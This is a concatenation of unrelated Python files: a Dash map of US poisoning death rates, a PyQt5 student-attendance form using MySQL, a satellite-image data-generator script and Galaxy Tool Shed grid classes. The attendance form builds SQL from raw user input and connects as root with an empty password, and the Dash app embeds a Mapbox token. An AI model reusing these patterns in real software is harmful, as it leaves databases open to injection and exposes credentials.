YEARS = [2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015]
BINS = [
"0-2",
"2.1-4",
"4.1-6",
"6.1-8",
"8.1-10",
"10.1-12",
"12.1-14",
"14.1-16",
"16.1-18",
"18.1-20",
"20.1-22",
"22.1-24",
"24.1-26",
"26.1-28",
"28.1-30",
">30",
]
DEFAULT_COLORSCALE = [
"#f2fffb",
"#bbffeb",
"#98ffe0",
"#79ffd6",
"#6df0c8",
"#69e7c0",
"#59dab2",
"#45d0a5",
"#31c194",
"#2bb489",
"#25a27b",
"#1e906d",
"#188463",
"#157658",
"#11684d",
"#10523e",
]
DEFAULT_OPACITY = 0.8
mapbox_access_token = "pk.eyJ1IjoicGxvdGx5bWFwYm94IiwiYSI6ImNrOWJqb2F4djBnMjEzbG50amg0dnJieG4ifQ.Zme1-Uzoi75IaFbieBDl3A"
mapbox_style = "mapbox://styles/plotlymapbox/cjvprkf3t1kns1cqjxuxmwixz"
# App layout
app.layout = html.Div(
id="root",
children=[
html.Div(
id="header",
children=[
html.Img(id="logo", src=app.get_asset_url("dash-logo.png")),
html.H4(children="Rate of US Poison-Induced Deaths"),
html.P(
id="description",
children="† Deaths are classified using the International Classification of Diseases, \
Tenth Revision (ICD–10). Drug-poisoning deaths are defined as having ICD–10 underlying \
cause-of-death codes X40–X44 (unintentional), X60–X64 (suicide), X85 (homicide), or Y10–Y14 \
(undetermined intent).",
),
],
),
html.Div(
id="app-container",
children=[
html.Div(
id="left-column",
children=[
html.Div(
id="slider-container",
children=[
html.P(
id="slider-text",
children="Drag the slider to change the year:",
),
dcc.Slider(
id="years-slider",
min=min(YEARS),
max=max(YEARS),
value=min(YEARS),
marks={
str(year): {
"label": str(year),
"style": {"color": "#7fafdf"},
}
for year in YEARS
},
),
],
),
html.Div(
id="heatmap-container",
children=[
html.P(
"Heatmap of age adjusted mortality rates \
from poisonings in year {0}".format(
min(YEARS)
),
id="heatmap-title",
),
dcc.Graph(
id="county-choropleth",
figure=dict(
layout=dict(
mapbox=dict(
layers=[],
accesstoken=mapbox_access_token,
style=mapbox_style,
center=dict(
lat=38.72490, lon=-95.61446
),
pitch=0,
zoom=3.5,
),
autosize=True,
),
),
),
],
),
],
),
html.Div(
id="graph-container",
children=[
html.P(id="chart-selector", children="Select chart:"),
dcc.Dropdown(
options=[
{
"label": "Histogram of total number of deaths (single year)",
"value": "show_absolute_deaths_single_year",
},
{
"label": "Histogram of total number of deaths (1999-2016)",
"value": "absolute_deaths_all_time",
},
{
"label": "Age-adjusted death rate (single year)",
"value": "show_death_rate_single_year",
},
{
"label": "Trends in age-adjusted death rate (1999-2016)",
"value": "death_rate_all_time",
},
],
value="show_death_rate_single_year",
id="chart-dropdown",
),
dcc.Graph(
id="selected-data",
figure=dict(
data=[dict(x=0, y=0)],
layout=dict(
paper_bgcolor="#F4F4F8",
plot_bgcolor="#F4F4F8",
autofill=True,
margin=dict(t=75, r=50, b=100, l=50),
),
),
),
],
),
],
),
],
)
@app.callback(
Output("county-choropleth", "figure"),
[Input("years-slider", "value")],
[State("county-choropleth", "figure")],
)
def display_map(year, figure):
cm = dict(zip(BINS, DEFAULT_COLORSCALE))
data = [
dict(
lat=df_lat_lon["Latitude "],
lon=df_lat_lon["Longitude"],
text=df_lat_lon["Hover"],
type="scattermapbox",
hoverinfo="text",
marker=dict(size=5, color="white", opacity=0),
)
]
annotations = [
dict(
showarrow=False,
align="right",
text="<b>Age-adjusted death rate<br>per county per year</b>",
font=dict(color="#2cfec1"),
bgcolor="#1f2630",
x=0.95,
y=0.95,
)
]
for i, bin in enumerate(reversed(BINS)):
color = cm[bin]
annotations.append(
dict(
arrowcolor=color,
text=bin,
x=0.95,
y=0.85 - (i / 20),
ax=-60,
ay=0,
arrowwidth=5,
arrowhead=0,
bgcolor="#1f2630",
font=dict(color="#2cfec1"),
)
)
if "layout" in figure:
lat = figure["layout"]["mapbox"]["center"]["lat"]
lon = figure["layout"]["mapbox"]["center"]["lon"]
zoom = figure["layout"]["mapbox"]["zoom"]
else:
lat = 38.72490
lon = -95.61446
zoom = 3.5
layout = dict(
mapbox=dict(
layers=[],
accesstoken=mapbox_access_token,
style=mapbox_style,
center=dict(lat=lat, lon=lon),
zoom=zoom,
),
hovermode="closest",
margin=dict(r=0, l=0, t=0, b=0),
annotations=annotations,
dragmode="lasso",
)
base_url = "https://raw.githubusercontent.com/jackparmer/mapbox-counties/master/"
for bin in BINS:
geo_layer = dict(
sourcetype="geojson",
source=base_url + str(year) + "/" + bin + ".geojson",
type="fill",
color=cm[bin],
opacity=DEFAULT_OPACITY,
# CHANGE THIS
fill=dict(outlinecolor="#afafaf"),
)
layout["mapbox"]["layers"].append(geo_layer)
fig = dict(data=data, layout=layout)
return fig
@app.callback(Output("heatmap-title", "children"), [Input("years-slider", "value")])
def update_map_title(year):
return "Heatmap of age adjusted mortality rates \
from poisonings in year {0}".format(
year
)
@app.callback(
Output("selected-data", "figure"),
[
Input("county-choropleth", "selectedData"),
Input("chart-dropdown", "value"),
Input("years-slider", "value"),
],
)
def display_selected_data(selectedData, chart_dropdown, year):
if selectedData is None:
return dict(
data=[dict(x=0, y=0)],
layout=dict(
title="Click-drag on the map to select counties",
paper_bgcolor="#1f2630",
plot_bgcolor="#1f2630",
font=dict(color="#2cfec1"),
margin=dict(t=75, r=50, b=100, l=75),
),
)
pts = selectedData["points"]
fips = [str(pt["text"].split("<br>")[-1]) for pt in pts]
for i in range(len(fips)):
if len(fips[i]) == 4:
fips[i] = "0" + fips[i]
dff = df_full_data[df_full_data["County Code"].isin(fips)]
dff = dff.sort_values("Year")
regex_pat = re.compile(r"Unreliable", flags=re.IGNORECASE)
dff["Age Adjusted Rate"] = dff["Age Adjusted Rate"].replace(regex_pat, 0)
if chart_dropdown != "death_rate_all_time":
title = "Absolute deaths per county, <b>1999-2016</b>"
AGGREGATE_BY = "Deaths"
if "show_absolute_deaths_single_year" == chart_dropdown:
dff = dff[dff.Year == year]
title = "Absolute deaths per county, <b>{0}</b>".format(year)
elif "show_death_rate_single_year" == chart_dropdown:
dff = dff[dff.Year == year]
title = "Age-adjusted death rate per county, <b>{0}</b>".format(year)
AGGREGATE_BY = "Age Adjusted Rate"
dff[AGGREGATE_BY] = pd.to_numeric(dff[AGGREGATE_BY], errors="coerce")
deaths_or_rate_by_fips = dff.groupby("County")[AGGREGATE_BY].sum()
deaths_or_rate_by_fips = deaths_or_rate_by_fips.sort_values()
# Only look at non-zero rows:
deaths_or_rate_by_fips = deaths_or_rate_by_fips[deaths_or_rate_by_fips > 0]
fig = deaths_or_rate_by_fips.iplot(
kind="bar", y=AGGREGATE_BY, title=title, asFigure=True
)
fig_layout = fig["layout"]
fig_data = fig["data"]
fig_data[0]["text"] = deaths_or_rate_by_fips.values.tolist()
fig_data[0]["marker"]["color"] = "#2cfec1"
fig_data[0]["marker"]["opacity"] = 1
fig_data[0]["marker"]["line"]["width"] = 0
fig_data[0]["textposition"] = "outside"
fig_layout["paper_bgcolor"] = "#1f2630"
fig_layout["plot_bgcolor"] = "#1f2630"
fig_layout["font"]["color"] = "#2cfec1"
fig_layout["title"]["font"]["color"] = "#2cfec1"
fig_layout["xaxis"]["tickfont"]["color"] = "#2cfec1"
fig_layout["yaxis"]["tickfont"]["color"] = "#2cfec1"
fig_layout["xaxis"]["gridcolor"] = "#5b5b5b"
fig_layout["yaxis"]["gridcolor"] = "#5b5b5b"
fig_layout["margin"]["t"] = 75
fig_layout["margin"]["r"] = 50
fig_layout["margin"]["b"] = 100
fig_layout["margin"]["l"] = 50
return fig
fig = dff.iplot(
kind="area",
x="Year",
y="Age Adjusted Rate",
text="County",
categories="County",
colors=[
"#1b9e77",
"#d95f02",
"#7570b3",
"#e7298a",
"#66a61e",
"#e6ab02",
"#a6761d",
"#666666",
"#1b9e77",
],
vline=[year],
asFigure=True,
)
for i, trace in enumerate(fig["data"]):
trace["mode"] = "lines+markers"
trace["marker"]["size"] = 4
trace["marker"]["line"]["width"] = 1
trace["type"] = "scatter"
for prop in trace:
fig["data"][i][prop] = trace[prop]
# Only show first 500 lines
fig["data"] = fig["data"][0:500]
fig_layout = fig["layout"]
# See plot.ly/python/reference
fig_layout["yaxis"]["title"] = "Age-adjusted death rate per county per year"
fig_layout["xaxis"]["title"] = ""
fig_layout["yaxis"]["fixedrange"] = True
fig_layout["xaxis"]["fixedrange"] = False
fig_layout["hovermode"] = "closest"
fig_layout["title"] = "<b>{0}</b> counties selected".format(len(fips))
fig_layout["legend"] = dict(orientation="v")
fig_layout["autosize"] = True
fig_layout["paper_bgcolor"] = "#1f2630"
fig_layout["plot_bgcolor"] = "#1f2630"
fig_layout["font"]["color"] = "#2cfec1"
fig_layout["xaxis"]["tickfont"]["color"] = "#2cfec1"
fig_layout["yaxis"]["tickfont"]["color"] = "#2cfec1"
fig_layout["xaxis"]["gridcolor"] = "#5b5b5b"
fig_layout["yaxis"]["gridcolor"] = "#5b5b5b"
if len(fips) > 500:
fig["layout"][
"title"
] = "Age-adjusted death rate per county per year <br>(only 1st 500 shown)"
return fig
if __name__ == "__main__":
app.run_server(debug=True)
|
py | 7df7ffe0c0e948946cc66a2710b0f245aaaffc5e | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'subjecttoteacher.ui'
#
# Created by: PyQt5 UI code generator 5.13.0
#
# WARNING! All changes made in this file will be lost!
from distutils.log import Log
import mysql.connector
from mysql.connector import Error , errorcode
from PyQt5.QtWidgets import (QApplication, QMainWindow)
from tests import Ui_Chart
from errdilog import Ui_Dialog
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtGui import QIcon, QPixmap
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(616, 477)
self.Submitdetails = QtWidgets.QPushButton(Form)
self.Submitdetails.setGeometry(QtCore.QRect(260, 320, 75, 23))
self.Submitdetails.setObjectName("Submitdetails")
self.Logo_2 = QtWidgets.QLabel(Form)
self.Logo_2.setGeometry(QtCore.QRect(240, 30, 100, 110))
self.Logo_2.setText("")
self.Logo_2.setObjectName("Logo_2")
pixmap = QPixmap('faceAttend.png')
self.Logo_2.setPixmap(pixmap)
self.ForEnroll = QtWidgets.QRadioButton(Form)
self.ForEnroll.setGeometry(QtCore.QRect(210, 175, 16, 16))
self.ForEnroll.setText("")
self.ForEnroll.setObjectName("ForEnroll")
self.Enroll = QtWidgets.QLineEdit(Form)
self.Enroll.setGeometry(QtCore.QRect(240, 170, 110, 20))
self.Enroll.setObjectName("Enroll")
self.Enroll.setPlaceholderText(" Enrollment Number")
self.ForRollnum = QtWidgets.QRadioButton(Form)
self.ForRollnum.setGeometry(QtCore.QRect(210, 225, 16, 16))
self.ForRollnum.setText("")
self.ForRollnum.setObjectName("ForRollnum")
self.StudentRollNum = QtWidgets.QComboBox(Form)
self.StudentRollNum.setGeometry(QtCore.QRect(240, 220, 110, 21))
self.StudentRollNum.setObjectName("StudentRollNum")
self.Semester = QtWidgets.QComboBox(Form)
self.Semester.setGeometry(QtCore.QRect(240, 260, 110, 21))
self.Semester.setObjectName("Semester")
self.retranslateUi(Form)
self.loaddata()
QtCore.QMetaObject.connectSlotsByName(Form)
self.Submitdetails.clicked.connect(self.studentdet)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
self.Submitdetails.setText(_translate("Form", "Search"))
self.Semester.addItem("mca1")
self.Semester.addItem("mca2")
self.Semester.addItem("mca3")
self.Semester.addItem("mca4")
self.Semester.addItem("mca5")
self.Semester.addItem("mca6")
def loaddata(self):
for x in range(1,11):
self.StudentRollNum.addItem(str(x))
# mydb = mysql.connector.connect(
# host="localhost",
# user="root",
# database="collegeattend",
# passwd=""
# )
# mycursor = mydb.cursor()
# mycursor.execute("SELECT name FROM studentdetails")
# myresult = mycursor.fetchall()
# for row in myresult:
# self.StudentRollNum.addItem(row[0])
def studentdet(self):
if self.ForEnroll.isChecked() == True:
if str(self.Enroll.text()) != "":
try:
mydb = mysql.connector.connect(
host="localhost",
user="root",
database="collegeattend",
passwd=""
)
mycursor = mydb.cursor()
mycursor.execute("SELECT * FROM studentdetails where enrollement = "+str(self.Enroll.text()))
myresult = mycursor.fetchone()
if myresult is None:
self.ERrCall()
else:
self.RollNUM = myresult[0]
self.ListSEM = myresult[5]
for x in myresult:
print(x)
except mysql.connector.Error as e:
print(e.errno)
print(e.sqlstate)
print("Error from Def Student Enoll".format(e))
else:
self.ERrCall()
elif self.ForRollnum.isChecked() == True:
try:
mydatabase = mysql.connector.connect(
host="localhost",
user="root",
database="collegeattend",
passwd=""
)
cursor = mydatabase.cursor()
sql = "SELECT * FROM `studentdetails` where rollnum = " + str(self.StudentRollNum.currentText()) + " and semester = '" + str(self.Semester.currentText())+"'"
print(sql)
cursor.execute(sql)
result = cursor.fetchone()
if result is None:
self.ERrCall()
else:
self.RollNUM = result[0]
self.ListSEM = result[5]
for x in result:
print(x)
self.FindSub()
except mysql.connector.Error as e:
print(e.errno)
print(e.sqlstate)
print("Error from Def Student combo Box".format(e))
else:
self.ERrCall()
def FindSub(self):
self.ListSubj = []
try:
mydatabase = mysql.connector.connect(
host="localhost",
user="root",
database="collegeattend",
passwd=""
)
cursor = mydatabase.cursor()
sql = "SELECT subject1,subject2,subject3,subject4,subject5,subject6,subject7 FROM `collgdatatable` where semestername= '" + str(self.ListSEM) + "'"
print(sql)
cursor.execute(sql)
result = cursor.fetchone()
if result is None:
self.ERrCall()
else:
for x in result:
self.ListSubj.append(str(x))
# print(len(self.ListSubj))
# for i in range(len(self.ListSubj)):
# print(self.ListSubj[i])
self.AvgSem()
except mysql.connector.Error as e:
print(e.errno)
print(e.sqlstate)
print("Error from Def FindSUb ".format(e))
def AvgSem(self):
self.SutTotalAttd = []
self.ToTalClass = []
for i in range(7):
try:
mydatabase = mysql.connector.connect(
host="localhost",
user="root",
database="collegeattend",
passwd=""
)
cursor = mydatabase.cursor()
sql = "SELECT COUNT(`"+str(self.RollNUM)+"`) FROM `"+str(self.ListSubj[i])+"` where `"+str(self.RollNUM)+"` = '1'"
print(sql)
cursor.execute(sql)
result = cursor.fetchone()
if result is None:
self.SutTotalAttd.append(str("Not"))
else:
for x in result:
self.SutTotalAttd.append(str(result[0]))
except mysql.connector.Error as e:
print(e.errno)
print(e.sqlstate)
print("Error from Def Avg and student total".format(e))
for i in range(7):
try:
mydatabase = mysql.connector.connect(
host="localhost",
user="root",
database="collegeattend",
passwd=""
)
cursor = mydatabase.cursor()
sql = "SELECT COUNT(`classdate`) FROM `"+str(self.ListSubj[i])+"`"
print(sql)
cursor.execute(sql)
result = cursor.fetchone()
if result is None:
self.ToTalClass.append(str("hot"))
else:
for x in result:
self.ToTalClass.append(str(result[0]))
except mysql.connector.Error as e:
print(e.errno)
print(e.sqlstate)
print("Error from Def Avg Total block".format(e))
print(len(self.ToTalClass))
print(len(self.SutTotalAttd))
self.Percentage = []
print("total class")
for j in range(len(self.ToTalClass)):
self.Percentage.append(int(self.SutTotalAttd[j])/int(self.ToTalClass[j])*100)
print("student Present")
for k in range(len(self.Percentage)):
print(self.Percentage[k])
self.window = QtWidgets.QMainWindow()
self.ui = Ui_Chart(self.Percentage,self.ListSubj)
self.ui.setupUi(self.window)
self.window.show()
def Outstring(self):
return self.Percentage
def ERrCall(self):
self.dilog = QtWidgets.QDialog()
self.dl = Ui_Dialog()
self.dl.setupUi(self.dilog)
self.dilog.show()
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Form = QtWidgets.QWidget()
ui = Ui_Form()
ui.setupUi(Form)
Form.show()
sys._excepthook = sys.excepthook
def my_exception_hook(exctype, value, traceback):
# Print the error and traceback
print(exctype, value, traceback)
# Call the normal Exception hook after
sys._excepthook(exctype, value, traceback)
sys.exit(1)
# Set the exception hook to our wrapping function
sys.excepthook = my_exception_hook
sys.exit(app.exec_())
|
py | 7df8004e0a78a89ffca7409b98aea6a207e5dcbf | from os.path import join
import argparse
from .potsdam import (
POTSDAM, PotsdamImageFileGenerator, PotsdamNumpyFileGenerator)
from .vaihingen import (
VAIHINGEN, VaihingenImageFileGenerator, VaihingenNumpyFileGenerator)
from .generators import NUMPY, IMAGE, TRAIN, VALIDATION
from .utils import _makedirs, plot_sample
from .settings import datasets_path, results_path
def get_data_generator(options, datasets_path):
if options.dataset_name == POTSDAM:
if options.generator_name == NUMPY:
return PotsdamNumpyFileGenerator(
datasets_path, options.active_input_inds,
options.train_ratio, options.cross_validation)
elif options.generator_name == IMAGE:
return PotsdamImageFileGenerator(
datasets_path, options.active_input_inds,
options.train_ratio, options.cross_validation)
else:
raise ValueError('{} is not a valid generator'.format(
options.generator_name))
elif options.dataset_name == VAIHINGEN:
if options.generator_name == IMAGE:
return VaihingenImageFileGenerator(
datasets_path,
options.include_depth, options.include_ndvi,
options.train_ratio)
elif options.generator_name == NUMPY:
return VaihingenNumpyFileGenerator(
datasets_path,
options.include_depth, options.include_ndvi,
options.train_ratio)
else:
raise ValueError('{} is not a valid generator'.format(
options.generator_name))
else:
raise ValueError('{} is not a valid dataset'.format(
options.dataset_name))
def plot_generator(dataset_name, generator_name, split):
nb_batches = 2
batch_size = 4
class Options():
def __init__(self):
self.dataset_name = dataset_name
self.generator_name = generator_name
self.include_ir = True
self.include_depth = True
self.include_ndvi = True
self.train_ratio = 0.7
options = Options()
generator = get_data_generator(options, datasets_path)
viz_path = join(
results_path, 'gen_samples', dataset_name, generator_name, split)
_makedirs(viz_path)
gen = generator.make_split_generator(
TRAIN, target_size=(400, 400), batch_size=batch_size, shuffle=True,
augment=True, normalize=True, eval_mode=True)
for batch_ind in range(nb_batches):
_, batch_y, all_batch_x, _, _ = next(gen)
for sample_ind in range(batch_size):
file_path = join(
viz_path, '{}_{}.pdf'.format(batch_ind, sample_ind))
plot_sample(
file_path, all_batch_x[sample_ind, :, :, :],
batch_y[sample_ind, :, :, :], generator)
def preprocess():
VaihingenImageFileGenerator.preprocess(datasets_path)
VaihingenNumpyFileGenerator.preprocess(datasets_path)
PotsdamImageFileGenerator.preprocess(datasets_path)
PotsdamNumpyFileGenerator.preprocess(datasets_path)
def plot_generators():
plot_generator(VAIHINGEN, IMAGE, TRAIN)
plot_generator(VAIHINGEN, IMAGE, VALIDATION)
plot_generator(VAIHINGEN, NUMPY, TRAIN)
plot_generator(VAIHINGEN, NUMPY, VALIDATION)
plot_generator(POTSDAM, IMAGE, TRAIN)
plot_generator(POTSDAM, IMAGE, VALIDATION)
plot_generator(POTSDAM, NUMPY, TRAIN)
plot_generator(POTSDAM, NUMPY, VALIDATION)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'--preprocess',
action='store_true', help='run preprocessing for all generators')
parser.add_argument(
'--plot',
action='store_true', help='plot all generators')
return parser.parse_args()
if __name__ == '__main__':
args = parse_args()
if args.preprocess:
preprocess()
if args.plot:
plot_generators()
|
py | 7df800a4409bb67671706dc9a4e7df107b58fbc7 | import json
import logging
from markupsafe import escape as escape_html
from sqlalchemy import (
and_,
false,
or_,
true,
)
import tool_shed.grids.util as grids_util
import tool_shed.repository_types.util as rt_util
import tool_shed.util.shed_util_common as suc
from galaxy.web.legacy_framework import grids
from tool_shed.util import (
hg_util,
metadata_util,
repository_util,
)
from tool_shed.webapp import model
log = logging.getLogger(__name__)
class CategoryGrid(grids.Grid):
class NameColumn(grids.TextColumn):
def get_value(self, trans, grid, category):
return category.name
class DescriptionColumn(grids.TextColumn):
def get_value(self, trans, grid, category):
return category.description
class RepositoriesColumn(grids.TextColumn):
def get_value(self, trans, grid, category):
category_name = str(category.name)
filter = trans.app.repository_grid_filter_manager.get_filter(trans)
if filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE:
return (
trans.app.repository_registry.certified_level_one_viewable_repositories_and_suites_by_category.get(
category_name, 0
)
)
elif filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE_SUITES:
return trans.app.repository_registry.certified_level_one_viewable_suites_by_category.get(
category_name, 0
)
elif filter == trans.app.repository_grid_filter_manager.filters.SUITES:
return trans.app.repository_registry.viewable_suites_by_category.get(category_name, 0)
else:
# The value filter is None.
return trans.app.repository_registry.viewable_repositories_and_suites_by_category.get(category_name, 0)
title = "Categories"
model_class = model.Category
template = "/webapps/tool_shed/category/grid.mako"
default_sort_key = "name"
columns = [
NameColumn(
"Name",
key="Category.name",
link=(lambda item: dict(operation="repositories_by_category", id=item.id)),
attach_popup=False,
),
DescriptionColumn("Description", key="Category.description", attach_popup=False),
RepositoriesColumn("Repositories", model_class=model.Repository, attach_popup=False),
]
# Override these
num_rows_per_page = 50
class RepositoryGrid(grids.Grid):
class NameColumn(grids.TextColumn):
def get_value(self, trans, grid, repository):
return escape_html(repository.name)
class TypeColumn(grids.TextColumn):
def get_value(self, trans, grid, repository):
type_class = repository.get_type_class(trans.app)
return escape_html(type_class.label)
class HeadsColumn(grids.GridColumn):
def __init__(self, col_name):
grids.GridColumn.__init__(self, col_name)
def get_value(self, trans, grid, repository):
"""Display the current repository heads."""
repo = repository.hg_repo
heads = hg_util.get_repository_heads(repo)
multiple_heads = len(heads) > 1
if multiple_heads:
heads_str = '<font color="red">'
else:
heads_str = ""
for ctx in heads:
heads_str += f"{hg_util.get_revision_label_from_ctx(ctx, include_date=True)}<br/>"
heads_str.rstrip("<br/>")
if multiple_heads:
heads_str += "</font>"
return heads_str
class MetadataRevisionColumn(grids.GridColumn):
def __init__(self, col_name):
grids.GridColumn.__init__(self, col_name)
def get_value(self, trans, grid, repository):
"""Display a SelectField whose options are the changeset_revision strings of all metadata revisions of this repository."""
# A repository's metadata revisions may not all be installable, as some may contain only invalid tools.
select_field = grids_util.build_changeset_revision_select_field(trans, repository, downloadable=False)
if len(select_field.options) > 1:
tmpl = f"<select name='{select_field.name}'>"
for o in select_field.options:
tmpl += f"<option value='{o[1]}'>{o[0]}</option>"
tmpl += "</select>"
return tmpl
elif len(select_field.options) == 1:
option_items = select_field.options[0][0]
rev_label, rev_date = option_items.split(" ")
rev_date = f'<i><font color="#666666">{rev_date}</font></i>'
return f"{rev_label} {rev_date}"
return ""
class LatestInstallableRevisionColumn(grids.GridColumn):
def __init__(self, col_name):
grids.GridColumn.__init__(self, col_name)
def get_value(self, trans, grid, repository):
"""Display the latest installable revision label (may not be the repository tip)."""
select_field = grids_util.build_changeset_revision_select_field(trans, repository, downloadable=False)
if select_field.options:
return select_field.options[0][0]
return ""
class TipRevisionColumn(grids.GridColumn):
def __init__(self, col_name):
grids.GridColumn.__init__(self, col_name)
def get_value(self, trans, grid, repository):
"""Display the repository tip revision label."""
return escape_html(repository.revision())
class DescriptionColumn(grids.TextColumn):
def get_value(self, trans, grid, repository):
return escape_html(repository.description)
class CategoryColumn(grids.TextColumn):
def get_value(self, trans, grid, repository):
rval = "<ul>"
if repository.categories:
for rca in repository.categories:
rval += f'<li><a href="browse_repositories?operation=repositories_by_category&id={trans.security.encode_id(rca.category.id)}">{rca.category.name}</a></li>'
else:
rval += "<li>not set</li>"
rval += "</ul>"
return rval
class RepositoryCategoryColumn(grids.GridColumn):
def filter(self, trans, user, query, column_filter):
"""Modify query to filter by category."""
if column_filter == "All":
return query
return query.filter(model.Category.name == column_filter)
class UserColumn(grids.TextColumn):
def get_value(self, trans, grid, repository):
if repository.user:
return escape_html(repository.user.username)
return "no user"
class EmailColumn(grids.TextColumn):
def filter(self, trans, user, query, column_filter):
if column_filter == "All":
return query
return query.filter(
and_(
model.Repository.table.c.user_id == model.User.table.c.id, model.User.table.c.email == column_filter
)
)
class EmailAlertsColumn(grids.TextColumn):
def get_value(self, trans, grid, repository):
if trans.user and repository.email_alerts and trans.user.email in json.loads(repository.email_alerts):
return "yes"
return ""
class DeprecatedColumn(grids.TextColumn):
def get_value(self, trans, grid, repository):
if repository.deprecated:
return "yes"
return ""
title = "Repositories"
model_class = model.Repository
default_sort_key = "name"
use_hide_message = False
columns = [
NameColumn(
"Name",
key="name",
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
),
DescriptionColumn("Synopsis", key="description", attach_popup=False),
TypeColumn("Type"),
MetadataRevisionColumn("Metadata<br/>Revisions"),
UserColumn(
"Owner",
model_class=model.User,
link=(lambda item: dict(operation="repositories_by_user", id=item.id)),
attach_popup=False,
key="User.username",
),
# Columns that are valid for filtering but are not visible.
EmailColumn("Email", model_class=model.User, key="email", visible=False),
RepositoryCategoryColumn("Category", model_class=model.Category, key="Category.name", visible=False),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name, description",
cols_to_filter=[columns[0], columns[1]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
default_filter = dict(deleted="False")
num_rows_per_page = 50
use_paging = True
allow_fetching_all_results = False
def build_initial_query(self, trans, **kwd):
filter = trans.app.repository_grid_filter_manager.get_filter(trans)
if filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE:
return (
trans.sa_session.query(model.Repository)
.join(model.RepositoryMetadata.table)
.filter(or_(*trans.app.repository_registry.certified_level_one_clause_list))
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
)
if filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE_SUITES:
return (
trans.sa_session.query(model.Repository)
.filter(model.Repository.type == rt_util.REPOSITORY_SUITE_DEFINITION)
.join(model.RepositoryMetadata.table)
.filter(or_(*trans.app.repository_registry.certified_level_one_clause_list))
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
)
else:
# The filter is None.
return (
trans.sa_session.query(model.Repository)
.filter(
and_(model.Repository.table.c.deleted == false(), model.Repository.table.c.deprecated == false())
)
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
)
class DockerImageGrid(RepositoryGrid):
columns = [
RepositoryGrid.NameColumn(
"Name",
key="name",
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
),
RepositoryGrid.DescriptionColumn("Synopsis", key="description", attach_popup=False),
RepositoryGrid.UserColumn(
"Owner",
model_class=model.User,
link=(lambda item: dict(operation="repositories_by_user", id=item.id)),
attach_popup=False,
key="User.username",
),
RepositoryGrid.EmailAlertsColumn("Alert", attach_popup=False),
]
operations = [grids.GridOperation("Include in Docker image", allow_multiple=True)]
show_item_checkboxes = True
class EmailAlertsRepositoryGrid(RepositoryGrid):
columns = [
RepositoryGrid.NameColumn(
"Name",
key="name",
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
),
RepositoryGrid.DescriptionColumn("Synopsis", key="description", attach_popup=False),
RepositoryGrid.UserColumn(
"Owner",
model_class=model.User,
link=(lambda item: dict(operation="repositories_by_user", id=item.id)),
attach_popup=False,
key="User.username",
),
RepositoryGrid.EmailAlertsColumn("Alert", attach_popup=False),
# Columns that are valid for filtering but are not visible.
grids.DeletedColumn("Deleted", key="deleted", visible=False, filterable="advanced"),
]
operations = [grids.GridOperation("Receive email alerts", allow_multiple=True)]
global_actions = [
grids.GridAction("User preferences", dict(controller="user", action="index", cntrller="repository"))
]
class MatchedRepositoryGrid(grids.Grid):
# This grid filters out repositories that have been marked as deleted or deprecated.
class NameColumn(grids.TextColumn):
def get_value(self, trans, grid, repository_metadata):
return escape_html(repository_metadata.repository.name)
class DescriptionColumn(grids.TextColumn):
def get_value(self, trans, grid, repository_metadata):
return escape_html(repository_metadata.repository.description)
class RevisionColumn(grids.TextColumn):
def get_value(self, trans, grid, repository_metadata):
return repository_metadata.changeset_revision
class UserColumn(grids.TextColumn):
def get_value(self, trans, grid, repository_metadata):
if repository_metadata.repository.user:
return escape_html(repository_metadata.repository.user.username)
return "no user"
# Grid definition
title = "Matching repositories"
model_class = model.RepositoryMetadata
default_sort_key = "Repository.name"
use_hide_message = False
columns = [
NameColumn(
"Repository name",
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=True,
),
DescriptionColumn("Synopsis", attach_popup=False),
RevisionColumn("Revision"),
UserColumn("Owner", model_class=model.User, attach_popup=False),
]
operations = [grids.GridOperation("Install to Galaxy", allow_multiple=True)]
num_rows_per_page = 50
use_paging = False
def build_initial_query(self, trans, **kwd):
match_tuples = kwd.get("match_tuples", [])
clause_list = []
if match_tuples:
for match_tuple in match_tuples:
repository_id, changeset_revision = match_tuple
clause_list.append(
and_(
model.RepositoryMetadata.repository_id == int(repository_id),
model.RepositoryMetadata.changeset_revision == changeset_revision,
)
)
return (
trans.sa_session.query(model.RepositoryMetadata)
.join(model.Repository)
.filter(
and_(model.Repository.table.c.deleted == false(), model.Repository.table.c.deprecated == false())
)
.join(model.User.table)
.filter(or_(*clause_list))
.order_by(model.Repository.name)
)
# Return an empty query
return trans.sa_session.query(model.RepositoryMetadata).filter(model.RepositoryMetadata.id < 0)
class InstallMatchedRepositoryGrid(MatchedRepositoryGrid):
columns = [col for col in MatchedRepositoryGrid.columns]
# Override the NameColumn
columns[0] = MatchedRepositoryGrid.NameColumn(
"Name", link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)), attach_popup=False
)
class MyWritableRepositoriesGrid(RepositoryGrid):
# This grid filters out repositories that have been marked as either deprecated or deleted.
title = "Repositories I can change"
columns = [
RepositoryGrid.NameColumn(
"Name",
key="name",
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
),
RepositoryGrid.TypeColumn("Type"),
RepositoryGrid.MetadataRevisionColumn("Metadata<br/>Revisions"),
RepositoryGrid.UserColumn(
"Owner",
model_class=model.User,
